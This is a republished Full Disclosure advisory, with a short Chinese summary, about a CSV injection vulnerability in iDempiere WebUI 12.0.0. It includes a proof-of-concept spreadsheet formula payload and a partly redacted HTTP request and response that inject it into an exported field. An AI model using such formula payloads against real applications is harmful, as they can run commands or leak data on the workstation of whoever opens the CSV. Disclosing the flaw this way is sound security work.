CSV Injection in iDempiere WebUI 12.0.0.202508171158
iDempiere WebUI v12.0.0.202508171158 存在 CSV 注入漏洞,允许认证攻击者通过恶意公式注入控制 CSV 文件内容,在打开时执行任意命令或窃取数据。 2025-8-19 03:0:14 Author: seclists.org(查看原文) 阅读量:10 收藏

fulldisclosure logo

Full Disclosure mailing list archives


From: Ron E <ronaldjedgerson () gmail com>
Date: Sun, 17 Aug 2025 22:33:31 -0400

A CSV Injection vulnerability exists in iDempiere WebUI
v12.0.0.202508171158. The application fails to properly sanitize
user-supplied input before including it in exported CSV files. An
authenticated attacker can inject malicious spreadsheet formulas
(e.g., =cmd|'/C
notepad'!A1) into fields that are later exported. When the CSV is opened in
spreadsheet software such as Microsoft Excel or LibreOffice Calc, the
injected formula is executed. Successful exploitation may allow arbitrary
command execution on the victim’s workstation, data exfiltration via
external cell references, or manipulation of the exported spreadsheet
content.

*Request:*

POST /webui HTTP/2

Host: <host>

-

dtid=******&cmd_0=onInitEdit&data_0=%7B%22value%22%3A%22%3Dcmd%7C'%20%2FC%20notepad'!'A1'%22%7D&cmd_1=onBlur
--snip--



*Response:*

HTTP/2 200 OK

-


{"rs"--snip--: =cmd|\' /C
notepad\'!\'A1\'',iconSclass:'z-icon-Window'},{},[]],
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

  • CSV Injection in iDempiere WebUI 12.0.0.202508171158 Ron E (Aug 18)

文章来源: https://seclists.org/fulldisclosure/2025/Aug/12
如有侵权请联系:admin#unsafe.sh